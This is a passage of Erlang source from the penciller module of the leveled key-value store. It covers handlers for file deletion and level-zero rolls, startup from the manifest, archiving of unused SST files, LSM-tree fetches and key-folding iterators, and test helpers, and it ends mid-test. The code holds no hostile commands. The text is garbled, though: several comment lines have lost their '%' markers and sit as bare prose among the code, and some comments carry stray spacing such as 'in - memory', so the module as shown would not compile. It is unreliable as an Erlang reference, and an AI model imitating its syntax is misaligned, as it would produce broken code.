% checked against the manifest to prompt the deletion, however it must also
% be removed from the manifest's list of pending deletes. This is only
% possible when the manifest is in control of the penciller not the clerk.
% When work is ongoing (i.e. the manifest is under control of the clerk),
% any removals from the manifest need to be stored temporarily (in
% pending_removals) until such time that the manifest is in control of the
% penciller and can be updated.
% The maybe_release boolean on state is used if any file is not ready to
% delete, and there is work ongoing. This will then trigger a check to
% ensure any timed out snapshots are released, in case this is the factor
% blocking the delete confirmation
% When an updated manifest is submitted by the clerk, the pending_removals
% will be cleared from pending using the maybe_release boolean
case leveled_pmanifest:ready_to_delete(State#state.manifest, PDFN) of
true ->
leveled_log:log(p0005, [PDFN]),
ok = leveled_sst:sst_deleteconfirmed(FilePid),
case State#state.work_ongoing of
true ->
{noreply,
State#state{
pending_removals =
[PDFN|State#state.pending_removals]}};
false ->
UpdManifest =
leveled_pmanifest:clear_pending(
State#state.manifest,
[PDFN],
false),
{noreply,
State#state{manifest = UpdManifest}}
end;
false ->
case State#state.work_ongoing of
true ->
{noreply, State#state{maybe_release = true}};
false ->
UpdManifest =
leveled_pmanifest:clear_pending(
State#state.manifest,
[],
true),
{noreply,
State#state{manifest = UpdManifest}}
end
end;
handle_cast({levelzero_complete, FN, StartKey, EndKey, Bloom}, State) ->
leveled_log:log(p0029, []),
ManEntry = #manifest_entry{start_key=StartKey,
end_key=EndKey,
owner=State#state.levelzero_constructor,
filename=FN,
bloom=Bloom},
ManifestSQN = leveled_pmanifest:get_manifest_sqn(State#state.manifest) + 1,
UpdMan = leveled_pmanifest:insert_manifest_entry(State#state.manifest,
ManifestSQN,
0,
ManEntry),
Prompt clerk to ask about work - do this for every L0 roll
ok = leveled_pclerk:clerk_prompt(State#state.clerk),
{noreply, State#state{levelzero_cache=[],
levelzero_index=[],
levelzero_pending=false,
levelzero_constructor=undefined,
levelzero_size=0,
manifest=UpdMan,
persisted_sqn=State#state.ledger_sqn}};
handle_cast(work_for_clerk, State) ->
case {(State#state.levelzero_pending or State#state.work_ongoing),
leveled_pmanifest:levelzero_present(State#state.manifest)} of
{true, _L0Present} ->
% Work is blocked by ongoing activity
{noreply, State};
{false, true} ->
If L0 present , and no work ongoing - dropping L0 to L1 is the
% priority
ok = leveled_pclerk:clerk_push(
State#state.clerk, {0, State#state.manifest}),
{noreply, State#state{work_ongoing=true}};
{false, false} ->
% No impediment to work - see what other work may be required
% See if the in-memory cache requires rolling now
CacheOverSize =
maybe_cache_too_big(
State#state.levelzero_size,
State#state.levelzero_maxcachesize,
State#state.levelzero_cointoss),
CacheAlreadyFull =
leveled_pmem:cache_full(State#state.levelzero_cache),
% Check for a backlog of work
{WL, WC} = leveled_pmanifest:check_for_work(State#state.manifest),
case {WC, (CacheAlreadyFull or CacheOverSize)} of
{0, false} ->
% No work required
{noreply, State#state{work_backlog = false}};
{WC, true} when WC < ?WORKQUEUE_BACKLOG_TOLERANCE ->
Rolling the memory to create a new Level Zero file
% Must not do this if there is a work backlog beyond the
% tolerance, as then the backlog may never be addressed.
NextSQN =
leveled_pmanifest:get_manifest_sqn(
State#state.manifest) + 1,
{Constructor, none} =
roll_memory(
NextSQN,
State#state.ledger_sqn,
State#state.root_path,
none,
length(State#state.levelzero_cache),
State#state.sst_options,
false),
{noreply,
State#state{
levelzero_pending = true,
levelzero_constructor = Constructor,
work_backlog = false}};
{WC, L0Full} ->
% Address the backlog of work, either because there is no
% L0 work to do, or because the backlog has grown beyond
% tolerance
Backlog = WC >= ?WORKQUEUE_BACKLOG_TOLERANCE,
leveled_log:log(p0024, [WC, Backlog, L0Full]),
[TL|_Tail] = WL,
ok =
leveled_pclerk:clerk_push(
State#state.clerk, {TL, State#state.manifest}),
{noreply,
State#state{
work_backlog = Backlog, work_ongoing = true}}
end
end;
handle_cast({fetch_levelzero, Slot, ReturnFun}, State) ->
ReturnFun(lists:nth(Slot, State#state.levelzero_cache)),
{noreply, State};
handle_cast({log_level, LogLevel}, State) ->
PC = State#state.clerk,
ok = leveled_pclerk:clerk_loglevel(PC, LogLevel),
ok = leveled_log:set_loglevel(LogLevel),
SSTopts = State#state.sst_options,
SSTopts0 = SSTopts#sst_options{log_options = leveled_log:get_opts()},
{noreply, State#state{sst_options = SSTopts0}};
handle_cast({add_logs, ForcedLogs}, State) ->
PC = State#state.clerk,
ok = leveled_pclerk:clerk_addlogs(PC, ForcedLogs),
ok = leveled_log:add_forcedlogs(ForcedLogs),
SSTopts = State#state.sst_options,
SSTopts0 = SSTopts#sst_options{log_options = leveled_log:get_opts()},
{noreply, State#state{sst_options = SSTopts0}};
handle_cast({remove_logs, ForcedLogs}, State) ->
PC = State#state.clerk,
ok = leveled_pclerk:clerk_removelogs(PC, ForcedLogs),
ok = leveled_log:remove_forcedlogs(ForcedLogs),
SSTopts = State#state.sst_options,
SSTopts0 = SSTopts#sst_options{log_options = leveled_log:get_opts()},
{noreply, State#state{sst_options = SSTopts0}}.
%% handle the bookie stopping and stop this snapshot
handle_info({'DOWN', BookieMonRef, process, _BookiePid, _Info},
State=#state{bookie_monref = BookieMonRef}) ->
ok = pcl_releasesnapshot(State#state.source_penciller, self()),
{stop, normal, State};
handle_info(_Info, State) ->
{noreply, State}.
terminate(Reason, _State=#state{is_snapshot=Snap}) when Snap == true ->
leveled_log:log(p0007, [Reason]);
terminate(Reason, _State) ->
leveled_log:log(p0011, [Reason]).
format_status(normal, [_PDict, State]) ->
State;
format_status(terminate, [_PDict, State]) ->
State#state{manifest = redacted,
levelzero_cache = redacted,
levelzero_index = redacted,
levelzero_astree = redacted}.
code_change(_OldVsn, State, _Extra) ->
{ok, State}.
%%%============================================================================
%%% Path functions
%%%============================================================================
sst_rootpath(RootPath) ->
FP = RootPath ++ "/" ++ ?FILES_FP,
filelib:ensure_dir(FP ++ "/"),
FP.
sst_filename(ManSQN, Level, Count) ->
lists:flatten(io_lib:format("./~w_~w_~w" ++ ?SST_FILEX,
[ManSQN, Level, Count])).
%%%============================================================================
Internal functions
%%%============================================================================
-spec start_from_file(penciller_options()) -> {ok, pcl_state()}.
%% @doc
%% Normal start of a penciller (i.e. not a snapshot), needs to read the
%% filesystem and reconstruct the ledger from the files that it finds
start_from_file(PCLopts) ->
RootPath = PCLopts#penciller_options.root_path,
MaxTableSize = PCLopts#penciller_options.max_inmemory_tablesize,
OptsSST = PCLopts#penciller_options.sst_options,
Monitor = PCLopts#penciller_options.monitor,
SnapTimeoutShort = PCLopts#penciller_options.snaptimeout_short,
SnapTimeoutLong = PCLopts#penciller_options.snaptimeout_long,
{ok, MergeClerk} = leveled_pclerk:clerk_new(self(), RootPath, OptsSST),
CoinToss = PCLopts#penciller_options.levelzero_cointoss,
Used to randomly defer the writing of L0 file . Intended to help with
% vnode syncronisation issues (e.g. stop them all by default merging to
level zero concurrently )
InitState = #state{clerk = MergeClerk,
root_path = RootPath,
levelzero_maxcachesize = MaxTableSize,
levelzero_cointoss = CoinToss,
levelzero_index = [],
snaptimeout_short = SnapTimeoutShort,
snaptimeout_long = SnapTimeoutLong,
sst_options = OptsSST,
monitor = Monitor},
%% Open manifest
Manifest0 = leveled_pmanifest:open_manifest(RootPath),
OpenFun =
fun(FN, Level) ->
{ok, Pid, {_FK, _LK}, Bloom} =
leveled_sst:sst_open(sst_rootpath(RootPath),
FN, OptsSST, Level),
{Pid, Bloom}
end,
SQNFun = fun leveled_sst:sst_getmaxsequencenumber/1,
{MaxSQN, Manifest1, FileList} =
leveled_pmanifest:load_manifest(Manifest0, OpenFun, SQNFun),
leveled_log:log(p0014, [MaxSQN]),
ManSQN = leveled_pmanifest:get_manifest_sqn(Manifest1),
leveled_log:log(p0035, [ManSQN]),
Find any L0 files
L0FN = sst_filename(ManSQN + 1, 0, 0),
{State0, FileList0} =
case filelib:is_file(filename:join(sst_rootpath(RootPath), L0FN)) of
true ->
leveled_log:log(p0015, [L0FN]),
L0Open = leveled_sst:sst_open(sst_rootpath(RootPath),
L0FN,
OptsSST,
0),
{ok, L0Pid, {L0StartKey, L0EndKey}, Bloom} = L0Open,
L0SQN = leveled_sst:sst_getmaxsequencenumber(L0Pid),
L0Entry = #manifest_entry{start_key = L0StartKey,
end_key = L0EndKey,
filename = L0FN,
owner = L0Pid,
bloom = Bloom},
Manifest2 =
leveled_pmanifest:insert_manifest_entry(Manifest1,
ManSQN + 1,
0,
L0Entry),
leveled_log:log(p0016, [L0SQN]),
LedgerSQN = max(MaxSQN, L0SQN),
{InitState#state{manifest = Manifest2,
ledger_sqn = LedgerSQN,
persisted_sqn = LedgerSQN},
[L0FN|FileList]};
false ->
leveled_log:log(p0017, []),
{InitState#state{manifest = Manifest1,
ledger_sqn = MaxSQN,
persisted_sqn = MaxSQN},
FileList}
end,
ok = archive_files(RootPath, FileList0),
{ok, State0}.
-spec shutdown_manifest(leveled_pmanifest:manifest(), pid()|undefined) -> ok.
%% @doc
Shutdown all the SST files within the manifest
shutdown_manifest(Manifest, L0Constructor) ->
EntryCloseFun =
fun(ME) ->
Owner =
case is_record(ME, manifest_entry) of
true ->
ME#manifest_entry.owner;
false ->
case ME of
{_SK, ME0} ->
ME0#manifest_entry.owner;
ME ->
ME
end
end,
ok =
case check_alive(Owner) of
true ->
leveled_sst:sst_close(Owner);
false ->
ok
end
end,
leveled_pmanifest:close_manifest(Manifest, EntryCloseFun),
EntryCloseFun(L0Constructor).
-spec check_alive(pid()|undefined) -> boolean().
%% @doc
%% Double-check a processis active before attempting to terminate
check_alive(Owner) when is_pid(Owner) ->
is_process_alive(Owner);
check_alive(_Owner) ->
false.
-spec archive_files(list(), list()) -> ok.
%% @doc
Archive any sst files in the folder that have not been used to build the
%% ledger at startup. They may have not deeleted as expected, so this saves
%% them off as non-SST fies to make it easier for an admin to garbage collect
%% theses files
archive_files(RootPath, UsedFileList) ->
{ok, AllFiles} = file:list_dir(sst_rootpath(RootPath)),
FileCheckFun =
fun(FN, UnusedFiles) ->
FN0 = "./" ++ FN,
case filename:extension(FN0) of
?SST_FILEX ->
case lists:member(FN0, UsedFileList) of
true ->
UnusedFiles;
false ->
leveled_log:log(p0040, [FN0]),
[FN0|UnusedFiles]
end;
_ ->
UnusedFiles
end
end,
RenameFun =
fun(FN) ->
AltName = filename:join(sst_rootpath(RootPath),
filename:basename(FN, ?SST_FILEX))
++ ?ARCHIVE_FILEX,
file:rename(filename:join(sst_rootpath(RootPath), FN),
AltName)
end,
FilesToArchive = lists:foldl(FileCheckFun, [], AllFiles),
lists:foreach(RenameFun, FilesToArchive),
ok.
-spec maybe_cache_too_big(
pos_integer(), pos_integer(), boolean()) -> boolean().
%% @doc
%% Is the cache too big - should it be flushed to on-disk Level 0
%% There exists some jitter to prevent all caches from flushing concurrently
where there are multiple leveled instances on one machine .
maybe_cache_too_big(NewL0Size, L0MaxSize, CoinToss) ->
CacheTooBig = NewL0Size > L0MaxSize,
CacheMuchTooBig =
NewL0Size > min(?SUPER_MAX_TABLE_SIZE, 2 * L0MaxSize),
RandomFactor =
case CoinToss of
true ->
case leveled_rand:uniform(?COIN_SIDECOUNT) of
1 ->
true;
_ ->
false
end;
false ->
true
end,
CacheTooBig and (RandomFactor or CacheMuchTooBig).
-spec roll_memory(
pos_integer(), non_neg_integer(), string(),
levelzero_cache()|none, pos_integer(),
sst_options(), boolean())
-> {pid(), leveled_ebloom:bloom()|none}.
%% @doc
Roll the in - memory cache into a L0 file . If this is done synchronously ,
%% will return a bloom representing the contents of the file.
%%
Casting a large object ( the levelzero cache ) to the SST file does not lead
to an immediate return . With 32 K keys in the TreeList it could take around
35 - 40ms due to the overheads of copying .
%%
To avoid blocking the penciller , the SST file can request each item of the
%% cache one at a time.
%%
%% The Wait is set to false to use a cast when calling this in normal operation
%% where as the Wait of true is used at shutdown
roll_memory(NextManSQN, LedgerSQN, RootPath, none, CL, SSTOpts, false) ->
L0Path = sst_rootpath(RootPath),
L0FN = sst_filename(NextManSQN, 0, 0),
leveled_log:log(p0019, [L0FN, LedgerSQN]),
PCL = self(),
FetchFun =
fun(Slot, ReturnFun) -> pcl_fetchlevelzero(PCL, Slot, ReturnFun) end,
{ok, Constructor, _} =
leveled_sst:sst_newlevelzero(
L0Path, L0FN, CL, FetchFun, PCL, LedgerSQN, SSTOpts),
{Constructor, none};
roll_memory(NextManSQN, LedgerSQN, RootPath, L0Cache, CL, SSTOpts, true) ->
L0Path = sst_rootpath(RootPath),
L0FN = sst_filename(NextManSQN, 0, 0),
FetchFun = fun(Slot) -> lists:nth(Slot, L0Cache) end,
KVList = leveled_pmem:to_list(CL, FetchFun),
{ok, Constructor, _, Bloom} =
leveled_sst:sst_new(
L0Path, L0FN, 0, KVList, LedgerSQN, SSTOpts),
{Constructor, Bloom}.
-spec timed_fetch_mem(
tuple(),
{integer(), integer()},
leveled_pmanifest:manifest(), list(),
leveled_pmem:index_array(),
leveled_monitor:monitor()) -> leveled_codec:ledger_kv()|not_found.
%% @doc
%% Fetch the result from the penciller, starting by looking in the memory,
and if it is not found looking down level by level through the LSM tree .
%%
%% This allows for the request to be timed, and the timing result to be added
%% to the aggregate timings - so that timinings per level can be logged and
%% the cost of requests dropping levels can be monitored.
%%
%% the result tuple includes the level at which the result was found.
timed_fetch_mem(Key, Hash, Manifest, L0Cache, L0Index, Monitor) ->
SW0 = leveled_monitor:maybe_time(Monitor),
{R, Level} =
fetch_mem(Key, Hash, Manifest, L0Cache, L0Index, fun timed_sst_get/4),
{TS0, _SW1} = leveled_monitor:step_time(SW0),
maybelog_fetch_timing(Monitor, Level, TS0, R == not_present),
R.
-spec fetch_sqn(
leveled_codec:ledger_key(),
leveled_codec:segment_hash(),
leveled_pmanifest:manifest(),
list(),
leveled_pmem:index_array()) ->
not_present|leveled_codec:ledger_kv()|leveled_codec:ledger_sqn().
%% @doc
%% Fetch the result from the penciller, starting by looking in the memory,
and if it is not found looking down level by level through the LSM tree .
fetch_sqn(Key, Hash, Manifest, L0Cache, L0Index) ->
R = fetch_mem(Key, Hash, Manifest, L0Cache, L0Index, fun sst_getsqn/4),
element(1, R).
fetch_mem(Key, Hash, Manifest, L0Cache, L0Index, FetchFun) ->
PosList =
case L0Index of
none ->
lists:seq(1, length(L0Cache));
_ ->
leveled_pmem:check_index(Hash, L0Index)
end,
L0Check = leveled_pmem:check_levelzero(Key, Hash, PosList, L0Cache),
case L0Check of
{false, not_found} ->
fetch(Key, Hash, Manifest, 0, FetchFun);
{true, KV} ->
{KV, memory}
end.
-spec fetch(tuple(), {integer(), integer()},
leveled_pmanifest:manifest(), integer(),
sst_fetchfun()) -> {tuple()|not_present, integer()|basement}.
%% @doc
Fetch from the persisted portion of the LSM tree , checking each level in
%% turn until a match is found.
%% Levels can be skipped by checking the bloom for the relevant file at that
%% level.
fetch(_Key, _Hash, _Manifest, ?MAX_LEVELS + 1, _FetchFun) ->
{not_present, basement};
fetch(Key, Hash, Manifest, Level, FetchFun) ->
case leveled_pmanifest:key_lookup(Manifest, Level, Key) of
false ->
fetch(Key, Hash, Manifest, Level + 1, FetchFun);
FP ->
case leveled_pmanifest:check_bloom(Manifest, FP, Hash) of
true ->
case FetchFun(FP, Key, Hash, Level) of
not_present ->
fetch(Key, Hash, Manifest, Level + 1, FetchFun);
ObjectFound ->
{ObjectFound, Level}
end;
false ->
fetch(Key, Hash, Manifest, Level + 1, FetchFun)
end
end.
timed_sst_get(PID, Key, Hash, Level) ->
SW = os:timestamp(),
R = leveled_sst:sst_get(PID, Key, Hash),
T0 = timer:now_diff(os:timestamp(), SW),
log_slowfetch(T0, R, PID, Level, ?SLOW_FETCH).
sst_getsqn(PID, Key, Hash, _Level) ->
leveled_sst:sst_getsqn(PID, Key, Hash).
log_slowfetch(T0, R, PID, Level, FetchTolerance) ->
case {T0, R} of
{T, R} when T < FetchTolerance ->
R;
{T, not_present} ->
leveled_log:log(pc016, [PID, T, Level, not_present]),
not_present;
{T, R} ->
leveled_log:log(pc016, [PID, T, Level, found]),
R
end.
-spec compare_to_sqn(
leveled_codec:ledger_kv()|leveled_codec:sqn()|not_present,
integer()) -> sqn_check().
%% @doc
Check to see if the SQN in the penciller is after the SQN expected for an
%% object (used to allow the journal to check compaction status from a cache
%% of the ledger - objects with a more recent sequence number can be compacted).
compare_to_sqn(not_present, _SQN) ->
missing;
compare_to_sqn(ObjSQN, SQN) when is_integer(ObjSQN), ObjSQN > SQN ->
replaced;
compare_to_sqn(ObjSQN, _SQN) when is_integer(ObjSQN) ->
Normally we would expect the SQN to be equal here , but
this also allows for the Journal to have a more advanced
% value. We return true here as we wouldn't want to
% compact thta more advanced value, but this may cause
% confusion in snapshots.
current;
compare_to_sqn(Obj, SQN) ->
compare_to_sqn(leveled_codec:strip_to_seqonly(Obj), SQN).
%%%============================================================================
%%% Iterator functions
%%%
%%% TODO - move to dedicated module with extended unit testing
%%%============================================================================
-spec keyfolder(list(), list(), tuple(), tuple(),
{pclacc_fun(), any(), pos_integer()}) -> any().
%% @doc
%% The keyfolder will compare an iterator across the immutable in-memory cache
%% of the Penciller (the IMMiter), with an iterator across the persisted part
%% (the SSTiter).
%%
A Segment List and a MaxKeys may be passed . Every time something is added
to the accumulator MaxKeys is reduced - so set MaxKeys to -1 if it is
%% intended to be infinite.
%%
The basic principle is to take the next key in the IMMiter and compare it
to the next key in the SSTiter , and decide which one should be added to the
%% accumulator. The iterators are advanced if they either win (i.e. are the
%% next key), or are dominated. This goes on until the iterators are empty.
%%
%% To advance the SSTiter the find_nextkey/4 function is used, as the SSTiter
%% is an iterator across multiple levels - and so needs to do its own
%% comparisons to pop the next result.
keyfolder(IMMiter, SSTiter, StartKey, EndKey, {AccFun, Acc, Now}) ->
keyfolder({IMMiter, SSTiter},
{StartKey, EndKey},
{AccFun, Acc, Now},
{false, {0, infinity}, -1}).
keyfolder(_Iterators,
_KeyRange,
{_AccFun, Acc, _Now},
{_SegmentList, _LastModRange, MaxKeys}) when MaxKeys == 0 ->
{0, Acc};
keyfolder({[], SSTiter}, KeyRange, {AccFun, Acc, Now},
{SegmentList, LastModRange, MaxKeys}) ->
{StartKey, EndKey} = KeyRange,
case find_nextkey(SSTiter, StartKey, EndKey,
SegmentList, element(1, LastModRange)) of
no_more_keys ->
case MaxKeys > 0 of
true ->
% This query had a max count, so we must respond with the
% remainder on the count
{MaxKeys, Acc};
false ->
This query started with a MaxKeys set to -1 . Query is
not interested in having MaxKeys in Response
Acc
end;
{NxSSTiter, {SSTKey, SSTVal}} ->
{Acc1, MK1} =
maybe_accumulate(SSTKey, SSTVal,
{Acc, AccFun, Now},
MaxKeys, LastModRange),
keyfolder({[], NxSSTiter},
KeyRange,
{AccFun, Acc1, Now},
{SegmentList, LastModRange, MK1})
end;
keyfolder({[{IMMKey, IMMVal}|NxIMMiterator], SSTiterator},
KeyRange,
{AccFun, Acc, Now},
{SegmentList, LastModRange, MaxKeys}) ->
{StartKey, EndKey} = KeyRange,
case {IMMKey < StartKey, leveled_codec:endkey_passed(EndKey, IMMKey)} of
{false, true} ->
% There are no more keys in-range in the in-memory
% iterator, so take action as if this iterator is empty
% (see above)
keyfolder({[], SSTiterator},
KeyRange,
{AccFun, Acc, Now},
{SegmentList, LastModRange, MaxKeys});
{false, false} ->
case find_nextkey(SSTiterator, StartKey, EndKey,
SegmentList, element(1, LastModRange)) of
no_more_keys ->
% No more keys in range in the persisted store, so use the
in - memory KV as the next
{Acc1, MK1} =
maybe_accumulate(IMMKey, IMMVal,
{Acc, AccFun, Now},
MaxKeys, LastModRange),
keyfolder({NxIMMiterator,
[]},
KeyRange,
{AccFun, Acc1, Now},
{SegmentList, LastModRange, MK1});
{NxSSTiterator, {SSTKey, SSTVal}} ->
% There is a next key, so need to know which is the
next key between the two ( and handle two keys
% with different sequence numbers).
case leveled_codec:key_dominates({IMMKey,
IMMVal},
{SSTKey,
SSTVal}) of
left_hand_first ->
{Acc1, MK1} =
maybe_accumulate(IMMKey, IMMVal,
{Acc, AccFun, Now},
MaxKeys, LastModRange),
Stow the previous best result away at Level -1
% so that there is no need to iterate to it again
NewEntry = {-1, [{SSTKey, SSTVal}]},
keyfolder({NxIMMiterator,
lists:keystore(-1,
1,
NxSSTiterator,
NewEntry)},
KeyRange,
{AccFun, Acc1, Now},
{SegmentList, LastModRange, MK1});
right_hand_first ->
{Acc1, MK1} =
maybe_accumulate(SSTKey, SSTVal,
{Acc, AccFun, Now},
MaxKeys, LastModRange),
keyfolder({[{IMMKey, IMMVal}|NxIMMiterator],
NxSSTiterator},
KeyRange,
{AccFun, Acc1, Now},
{SegmentList, LastModRange, MK1});
left_hand_dominant ->
{Acc1, MK1} =
maybe_accumulate(IMMKey, IMMVal,
{Acc, AccFun, Now},
MaxKeys, LastModRange),
We can add to the accumulator here . As the SST
% key was the most dominant across all SST levels,
so there is no need to hold off until the IMMKey
is left hand first .
keyfolder({NxIMMiterator,
NxSSTiterator},
KeyRange,
{AccFun, Acc1, Now},
{SegmentList, LastModRange, MK1})
end
end
end.
-spec maybe_accumulate(leveled_codec:ledger_key(),
leveled_codec:ledger_value(),
{any(), pclacc_fun(), pos_integer()},
integer(),
{non_neg_integer(), non_neg_integer()|infinity})
-> any().
%% @doc
%% Make an accumulation decision based one the date range
maybe_accumulate(LK, LV,
{Acc, AccFun, QueryStartTime},
MaxKeys,
{LowLastMod, HighLastMod}) ->
{_SQN, _SH, LMD} = leveled_codec:strip_to_indexdetails({LK, LV}),
RunAcc =
(LMD == undefined) or
((LMD >= LowLastMod) and (LMD =< HighLastMod)),
case RunAcc and leveled_codec:is_active(LK, LV, QueryStartTime) of
true ->
{AccFun(LK, LV, Acc), MaxKeys - 1};
false ->
{Acc, MaxKeys}
end.
-spec find_nextkey(iterator(),
leveled_codec:ledger_key(), leveled_codec:ledger_key()) ->
no_more_keys|{iterator(), leveled_codec:ledger_kv()}.
%% @doc
%% Looks to find the best choice for the next key across the levels (other
%% than in-memory table)
%% In finding the best choice, the next key in a given level may be a next
%% block or next file pointer which will need to be expanded
find_nextkey(QueryArray, StartKey, EndKey) ->
find_nextkey(QueryArray, StartKey, EndKey, false, 0).
find_nextkey(QueryArray, StartKey, EndKey, SegmentList, LowLastMod) ->
find_nextkey(QueryArray,
-1,
{null, null},
StartKey, EndKey,
SegmentList,
LowLastMod,
?ITERATOR_SCANWIDTH).
find_nextkey(_QueryArray, LCnt,
{null, null},
_StartKey, _EndKey,
_SegList, _LowLastMod, _Width) when LCnt > ?MAX_LEVELS ->
% The array has been scanned wihtout finding a best key - must be
% exhausted - respond to indicate no more keys to be found by the
% iterator
no_more_keys;
find_nextkey(QueryArray, LCnt,
{BKL, BestKV},
_StartKey, _EndKey,
_SegList, _LowLastMod, _Width) when LCnt > ?MAX_LEVELS ->
% All levels have been scanned, so need to remove the best result from
the array , and return that array along with the best key / sqn / status
% combination
{BKL, [BestKV|Tail]} = lists:keyfind(BKL, 1, QueryArray),
{lists:keyreplace(BKL, 1, QueryArray, {BKL, Tail}), BestKV};
find_nextkey(QueryArray, LCnt,
{BestKeyLevel, BestKV},
StartKey, EndKey,
SegList, LowLastMod, Width) ->
% Get the next key at this level
{NextKey, RestOfKeys} =
case lists:keyfind(LCnt, 1, QueryArray) of
false ->
{null, null};
{LCnt, []} ->
{null, null};
{LCnt, [NK|ROfKs]} ->
{NK, ROfKs}
end,
% Compare the next key at this level with the best key
case {NextKey, BestKeyLevel, BestKV} of
{null, BKL, BKV} ->
% There is no key at this level - go to the next level
find_nextkey(QueryArray,
LCnt + 1,
{BKL, BKV},
StartKey, EndKey,
SegList, LowLastMod, Width);
{{next, Owner, _SK}, BKL, BKV} ->
The first key at this level is pointer to a file - need to query
% the file to expand this level out before proceeding
Pointer = {next, Owner, StartKey, EndKey},
UpdList = leveled_sst:sst_expandpointer(Pointer,
RestOfKeys,
Width,
SegList,
LowLastMod),
NewEntry = {LCnt, UpdList},
Need to loop around at this level ( LCnt ) as we have not yet
% examined a real key at this level
find_nextkey(lists:keyreplace(LCnt, 1, QueryArray, NewEntry),
LCnt,
{BKL, BKV},
StartKey, EndKey,
SegList, LowLastMod, Width);
{{pointer, SSTPid, Slot, PSK, PEK}, BKL, BKV} ->
The first key at this level is pointer within a file - need to
% query the file to expand this level out before proceeding
Pointer = {pointer, SSTPid, Slot, PSK, PEK},
UpdList = leveled_sst:sst_expandpointer(Pointer,
RestOfKeys,
Width,
SegList,
LowLastMod),
NewEntry = {LCnt, UpdList},
Need to loop around at this level ( LCnt ) as we have not yet
% examined a real key at this level
find_nextkey(lists:keyreplace(LCnt, 1, QueryArray, NewEntry),
LCnt,
{BKL, BKV},
StartKey, EndKey,
SegList, LowLastMod, Width);
{{Key, Val}, null, null} ->
% No best key set - so can assume that this key is the best key,
% and check the lower levels
find_nextkey(QueryArray,
LCnt + 1,
{LCnt, {Key, Val}},
StartKey, EndKey,
SegList, LowLastMod, Width);
{{Key, Val}, _BKL, {BestKey, _BestVal}} when Key < BestKey ->
% There is a real key and a best key to compare, and the real key
% at this level is before the best key, and so is now the new best
% key
The QueryArray is not modified until we have checked all levels
find_nextkey(QueryArray,
LCnt + 1,
{LCnt, {Key, Val}},
StartKey, EndKey,
SegList, LowLastMod, Width);
{{Key, Val}, BKL, {BestKey, BestVal}} when Key == BestKey ->
SQN = leveled_codec:strip_to_seqonly({Key, Val}),
BestSQN = leveled_codec:strip_to_seqonly({BestKey, BestVal}),
if
SQN =< BestSQN ->
% This is a dominated key, so we need to skip over it
NewQArray = lists:keyreplace(LCnt,
1,
QueryArray,
{LCnt, RestOfKeys}),
find_nextkey(NewQArray,
LCnt + 1,
{BKL, {BestKey, BestVal}},
StartKey, EndKey,
SegList, LowLastMod, Width);
SQN > BestSQN ->
% There is a real key at the front of this level and it has
a higher SQN than the best key , so we should use this as
% the best key
% But we also need to remove the dominated key from the
% lower level in the query array
OldBestEntry = lists:keyfind(BKL, 1, QueryArray),
{BKL, [{BestKey, BestVal}|BestTail]} = OldBestEntry,
find_nextkey(lists:keyreplace(BKL,
1,
QueryArray,
{BKL, BestTail}),
LCnt + 1,
{LCnt, {Key, Val}},
StartKey, EndKey,
SegList, LowLastMod, Width)
end;
{_, BKL, BKV} ->
% This is not the best key
find_nextkey(QueryArray,
LCnt + 1,
{BKL, BKV},
StartKey, EndKey,
SegList, LowLastMod, Width)
end.
-spec maybelog_fetch_timing(
leveled_monitor:monitor(),
memory|leveled_pmanifest:lsm_level(),
leveled_monitor:timing(),
boolean()) -> ok.
maybelog_fetch_timing(_Monitor, _Level, no_timing, _NF) ->
ok;
maybelog_fetch_timing({Pid, _StatsFreq}, _Level, FetchTime, true) ->
leveled_monitor:add_stat(Pid, {pcl_fetch_update, not_found, FetchTime});
maybelog_fetch_timing({Pid, _StatsFreq}, Level, FetchTime, _NF) ->
leveled_monitor:add_stat(Pid, {pcl_fetch_update, Level, FetchTime}).
%%%============================================================================
%%% Test
%%%============================================================================
-ifdef(TEST).
generate_randomkeys({Count, StartSQN}) ->
generate_randomkeys(Count, StartSQN, []).
generate_randomkeys(0, _SQN, Acc) ->
lists:reverse(Acc);
generate_randomkeys(Count, SQN, Acc) ->
K = {o,
lists:concat(["Bucket", leveled_rand:uniform(1024)]),
lists:concat(["Key", leveled_rand:uniform(1024)]),
null},
RandKey = {K,
{SQN,
{active, infinity},
leveled_codec:segment_hash(K),
null}},
generate_randomkeys(Count - 1, SQN + 1, [RandKey|Acc]).
clean_testdir(RootPath) ->
clean_subdir(sst_rootpath(RootPath)),
clean_subdir(filename:join(RootPath, ?MANIFEST_FP)).
clean_subdir(DirPath) ->
case filelib:is_dir(DirPath) of
true ->
{ok, Files} = file:list_dir(DirPath),
lists:foreach(fun(FN) ->
File = filename:join(DirPath, FN),
ok = file:delete(File),
io:format("Success deleting ~s~n", [File])
end,
Files);
false ->
ok
end.
maybe_pause_push(PCL, KL) ->
T0 = [],
I0 = leveled_pmem:new_index(),
T1 = lists:foldl(fun({K, V}, {AccSL, AccIdx, MinSQN, MaxSQN}) ->
UpdSL = [{K, V}|AccSL],
SQN = leveled_codec:strip_to_seqonly({K, V}),
H = leveled_codec:segment_hash(K),
UpdIdx = leveled_pmem:prepare_for_index(AccIdx, H),
{UpdSL, UpdIdx, min(SQN, MinSQN), max(SQN, MaxSQN)}
end,
{T0, I0, infinity, 0},
KL),
SL = element(1, T1),
Tree = leveled_tree:from_orderedlist(lists:ukeysort(1, SL), ?CACHE_TYPE),
T2 = setelement(1, T1, Tree),
case pcl_pushmem(PCL, T2) of
returned ->
timer:sleep(50),
maybe_pause_push(PCL, KL);
ok ->
ok
end.
%% old test data doesn't have the magic hash
add_missing_hash({K, {SQN, ST, MD}}) ->
{K, {SQN, ST, leveled_codec:segment_hash(K), MD}}.
archive_files_test() ->
RootPath = "test/test_area/ledger",
SSTPath = sst_rootpath(RootPath),
ok = filelib:ensure_dir(SSTPath),
ok = file:write_file(SSTPath ++ "/test1.sst", "hello_world"),
ok = file:write_file(SSTPath ++ "/test2.sst", "hello_world"),
ok = file:write_file(SSTPath ++ "/test3.bob", "hello_world"),
UsedFiles = ["./test1.sst"],
ok = archive_files(RootPath, UsedFiles),
{ok, AllFiles} = file:list_dir(SSTPath),
?assertMatch(true, lists:member("test1.sst", AllFiles)),
?assertMatch(false, lists:member("test2.sst", AllFiles)),
?assertMatch(true, lists:member("test3.bob", AllFiles)),
?assertMatch(true, lists:member("test2.bak", AllFiles)),
ok = clean_subdir(SSTPath).
shutdown_when_compact(Pid) ->
FoldFun =
fun(_I, Ready) ->
case Ready of
true ->
true;
false ->
timer:sleep(200),
not pcl_checkforwork(Pid)
end
end,
true = lists:foldl(FoldFun, false, lists:seq(1, 100)),
io:format("No outstanding compaction work for ~w~n", [Pid]),
pcl_close(Pid).
format_status_test() ->
RootPath = "test/test_area/ledger",
